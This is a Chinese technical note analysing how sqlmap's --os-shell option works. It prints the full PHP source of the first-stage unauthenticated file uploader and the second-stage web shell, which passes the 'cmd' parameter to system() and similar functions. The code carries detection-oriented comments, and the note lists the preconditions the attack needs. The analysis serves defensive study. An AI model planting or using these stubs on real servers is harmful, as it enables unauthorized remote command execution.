sqlmap --os-shell原理
过程
1、发现注入点
2、使用sqlmap中--os-shell参数
3、选择语言
4、设置路径
5、建立os-shell 执行命令
原理研究
用 INTO OUTFILE 语句将一个可用于上传文件的 tmpukjhb.php 写到网站根目录下
然后利用 tmpukjhb.php 上传一个 tmpbezal.php 文件，tmpbezal.php 可用来执行系统命令，并将执行结果返回
当 --os-shell 退出时，sqlmap 会调用后门脚本删除已上传的文件，随后后门脚本再进行自删除
代码
tmpujqbu.php
<?php
// First-stage upload stub dropped by sqlmap --os-shell. Documented here for
// analysis: it is an unauthenticated file uploader whose only protection is
// the randomness of its file name. Request-side indicators are a POST carrying
// the fields "upload", "uploadDir" and a multipart "file"; the response-side
// indicator is the fixed string "File uploaded".
if (isset($_REQUEST["upload"])) {
// Destination directory is taken verbatim from the request; nothing below
// validates or restricts it.
$dir = $_REQUEST["uploadDir"];
// Version gate: $HTTP_POST_FILES is the pre-4.1 name of $_FILES, so both
// branches do the same thing with a different superglobal.
if (phpversion() < '4.1.0') {
$file = $HTTP_POST_FILES["file"]["name"];
// "@" hides any warning and "or die()" ends the script silently, so a
// failed move produces an empty response rather than an error message.
@move_uploaded_file($HTTP_POST_FILES["file"]["tmp_name"], $dir . "/" . $file) or die();
} else {
// The client-supplied file name is used as-is when building the target path.
$file = $_FILES["file"]["name"];
@move_uploaded_file($_FILES["file"]["tmp_name"], $dir . "/" . $file) or die();
}
// Dropped file is marked 0755; a newly executable file in the web root is
// one more artefact to look for on disk.
@chmod($dir . "/" . $file, 0755);
// Constant success marker - usable as a response-body signature in proxy/WAF logs.
echo "File uploaded";
} else {
// Any request without "upload" renders the upload form. The default value
// of uploadDir is the target directory configured when this sample was
// generated (the path shown in the listing).
echo "<form action=" . $_SERVER["PHP_SELF"] . " method=POST enctype=multipart/form-data><input type=hidden name=MAX_FILE_SIZE value=1000000000><b>sqlmap file uploader</b><br><input name=file type=file><br>to directory: <input type=text name=uploadDir value=/var/www/html/hackable/uploads/> <input type=submit name=upload value=upload></form>";
} ?>
tmpbezal.php
<?php
// Second-stage command runner dropped by sqlmap --os-shell. Documented here
// for analysis: the request parameter "cmd" is handed to the first available
// execution function and its output is echoed back inside <pre>...</pre>.
// A "cmd" parameter paired with a <pre>-wrapped response body is the
// practical detection signature for this stage.
$c = $_REQUEST["cmd"];
// Keep a long-running command alive regardless of script time limits or the
// client disconnecting; all three calls are "@"-suppressed so a restrictive
// ini produces no warning text in the response.
@set_time_limit(0);
@ignore_user_abort(1);
@ini_set('max_execution_time', 0);
// Turn disable_functions into a trimmed list so each candidate function can
// be checked against it below; an empty setting yields an empty list.
$z = @ini_get('disable_functions');
if (!empty($z)) {
$z = preg_replace('/[, ]+/', ',', $z);
$z = explode(',', $z);
$z = array_map('trim', $z);
} else {
$z = array();
}
// Redirect stderr into stdout so error output is captured as well.
$c = $c . " 2>&1\n";
// True when $n exists as a callable and is not listed in disable_functions.
function f($n) {
global $z;
return is_callable($n) and !in_array($n, $z);
}
// Fallback chain, in order: system, proc_open, shell_exec, passthru, popen,
// exec. The first function that is not disabled is used; $w holds the output.
if (f('system')) {
// system() echoes directly, so output buffering is used to capture it.
ob_start();
system($c);
$w = ob_get_contents();
ob_end_clean();
} elseif (f('proc_open')) {
// NOTE(review): pipe, r and w below are bare, unquoted identifiers. PHP 8
// raises an Error for an undefined constant, so on PHP 8 this branch ends
// the script instead of running the command; earlier versions only warn.
$y = proc_open($c, array(
array(
pipe,
r
) ,
array(
pipe,
w
) ,
array(
pipe,
w
)
) , $t);
// $t receives the pipe handles; index 1 is the child's stdout, read in
// 512-byte chunks until EOF.
$w = NULL;
while (!feof($t[1])) {
$w.= fread($t[1], 512);
}
@proc_close($y);
} elseif (f('shell_exec')) {
// shell_exec() returns the full output as a string.
$w = shell_exec($c);
} elseif (f('passthru')) {
// passthru() writes raw output, captured via output buffering like system().
ob_start();
passthru($c);
$w = ob_get_contents();
ob_end_clean();
} elseif (f('popen')) {
// Same bare "r" identifier as in the proc_open branch (see note above).
$x = popen($c, r);
$w = NULL;
if (is_resource($x)) {
while (!feof($x)) {
$w.= fread($x, 512);
}
}
// pclose() is attempted even if popen() failed; the warning is suppressed.
@pclose($x);
} elseif (f('exec')) {
// exec() fills $w with one array element per output line; rejoined with LF.
$w = array();
exec($c, $w);
$w = join(chr(10) , $w) . chr(10);
} else {
// No execution function available: the response becomes "<pre>0</pre>".
$w = 0;
}
// Output marker: command output is always returned wrapped in <pre> tags.
print "<pre>" . $w . "</pre>"; ?>
使用条件
数据库用户具有 FILE 权限
网站目录的可写绝对路径
PHP magic_quotes_gpc 为 off